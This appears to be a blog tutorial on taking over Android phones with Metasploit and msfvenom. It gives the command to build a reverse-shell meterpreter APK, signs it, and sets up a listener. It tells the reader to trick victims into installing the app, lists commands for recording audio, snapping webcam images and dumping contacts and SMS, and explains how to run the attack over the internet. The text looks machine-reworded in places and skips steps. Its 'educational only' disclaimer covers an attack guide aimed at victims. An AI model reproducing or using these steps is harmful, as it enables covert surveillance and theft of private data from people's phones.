Android Security Hacking android smartphone using Metasploit and msfvenom Framework

Hacking android smartphone using Metasploit and msfvenom Framework

You have most likely heard about essentially the most famous hacking framework called Metasploit. This framework is one of many most used pentesting frameworks which by default is included in Kali Linux. All the professional hackers recommend Metasploit as their ideal tool for hacking and exploitation of android telephones as well and windows devices. It also has loads of modules for hacking IOS. The Metasploit and msfvenom are considered the most effective combination for hacking android devices.

What is msfvenom?

Msfvenom is an android hacking framework used for making hacking apk files which have embedded reverse shells which can be utilized for hacking android devices. This tool was not present in backtrack however is now present in Kali Linux as a separate option to make android hacking as easy as doable. We might be using Metasploit and msfvenom together for this hack.

So why is Metasploit so great?

Metasploit built by rapid7 is a community-based project. It has quite a few exploits and hacks made and optimized by the community. The better part is that it’s free.

So today we’re going to guide you on how to hack android telephone using Metasploit and MSFVenom.

For performing this hack using Metasploit or msfvenom, you’ll want Kali Linux OS installed in your computer and Android Phone as a target. And clearly, internet connection is a must.

This tutorial is for educational purpose only. Please remember that hacking is against the law unless you’ve permission from the account owner and the parties involved. This post ought to be used as a tool to assist people perceive how hackers are hacking android devices with Metasploit and msfvenom. Our team/web site shall not be held responsible if any criminal prices are brought against any one who misuses the information on this web site to violate the law.

Below are the steps to perform this hack using Metasploit or msfvenom. So let’s start hacking.

Step 1: Creating a malicious apk file

Open your KALI LINUX. Open your Terminal and type within the following command

Hack Android Phone using metasploit and msfvenom

# msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > hackingworld.apk


metasploit and msfvenom command prompt

**LHOST= YOUR IP address

**LPORT= 4444

**Use ifconfig to find your IP address in case you don`t know.

# ifconfig

metasploit and msfvenom using kali linux

Step 2: Delivering APK file to the victim

You have now created your malicious spyware .apk file using Metasploit and msfvenom. It might be saved to your /home/ folder by default. Find your newly created hackingworld.apk and send it to your target (hackingworld.apk). Use social engineering to do that in order that the victim does install the apk.

**If you get any signing errors or issues use the next:

Keytool (Comes Pre-Installed in Kali Linux)

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

Jarsigner (Comes Pre-Installed in Kali Linux)

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hackingworld.apk aliasname

jarsigner -verify -verbose -certs hackingworld.apk

Step 3: Metasploit setup

Open up a brand new terminal and use the next command to start Metasploit framework.

metasploit and msfvenom using console

# msfconsole

Now within the Metasploit framework console type the next

msf  > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit


**LHOST= YOUR IP address

**LPORT= 4444

metasploit and msfvenom using TCP handler

Now when the user opens up the app on his/her telephone, you’ll get a session with that device. And whoa! The device is yours to operate. Metasploit and msfvenom usually are not that difficult to make use of however want very methodology steps that must implement.

Step 4: Exploit..!!!

The second the victim opens the application on their device, you’ll get a meterpreter shell on the Kali Linux terminal.

You have now successfully hacked the android device using Metasploit and msfvenom

Some commands it is best to attempt using Metasploit and msfvenom:

– record_mic

Records the audio from the android device and stores it on the local drive.

– webcam_snap

Lets you are taking the images by hacking the android camera of the device

– webcam_stream

Lets you stream live video from the hacked android camera

– dump_contacts

Lets you hack and copy all of the contacts from the victim’s telephone.

– dump_sms

Lets you hack the victim’s messages and stored it in a text file in your system.

– geolocate

Helps you track the hacked device by location

So, that is how hackers hack using Metasploit and msfvenom on the local network. But what if we desired to hack android devices with Metasploit over the web.

So now for some advanced stuff…

Hacking Over the web with Metasploit and msfvenom

So what if we desired to make the hack work anywhere on the earth. What can we do to make the hack global in order that we may hack anybody over the web with out buying any costly server?

Step 1: We want a router which might port forwarding feature. This is a must for hacking over the web with Metasploit.

Step 3: Next, we’d like dynamic IP for msfvenom and Metasploit to work over the web, so go to and join. After signing up,

Click on Add Host and enter any name for the host. Click on save the host.

Step 4: Now Download DUC from the official web site or click here. Install the DUC client and check in to your account. Once you do the IP address in your system will automatically be updated within the DNS.  In case this doesn`t occur, you possibly can manually configure the DNS.

Step 5: Click on add hosts on the DUC client as shown. If done properly, you’ll get all three green ticks.

Set the right host

All the settings are set

Step 6: Now, we’d like the gateway IP to port forward from our router settings. So type “ifconfig” within the command prompt, and you’ll get the gateway IP.

Step 7: Now open any browser you’ve and paste the gateway IP there. It will prompt the login page. Enter the username and password of your router (by default both is admin for many routers).

Step 8: Now navigate to the port forwarding option. Depending upon the router brand, the page is perhaps at a special location, however the underlying principle is similar.

Support required for Spynote

Step 9: Click on Add Port and put worth Add port 2222 again and keep it. You can put any port number you want.

Step 10: Now, whereas setting up the 2 commands rather than my local IP use the ddns you only made on no IP.

So in my case, it might be rather than

Hack Android Phone using metasploit and msfvenom

metasploit and msfvenom using TCP handler

Step 15: Now, the rest of the tactic is similar. You have to make use of social engineering to make the victim install the APK on their device. This part is something it’s a must to do by yourself. It’s as much as your creativity.

Step 16: You have successfully hacked into the victim’s telephone as quickly as they install and open it.

Step 17: You needn’t use NOIP you possibly can rather than your public IP address whereas making the apk and setting up Metasploit. But the problem is the public Ip address retains sometimes changing, so making use of public IP might be a brief solution. Just google whats my IP to find your public IP address

public ip

Step 18: If you’re having any issues with the no IP client. Do not use it instead, just directly use your public IP. Port forwarding is required by default on all hacking methods over the web.

Hope you all have enjoyed the session on hacking android mobiles with ease. Do not forget to share your comments.


Please enter your comment!
Please enter your name here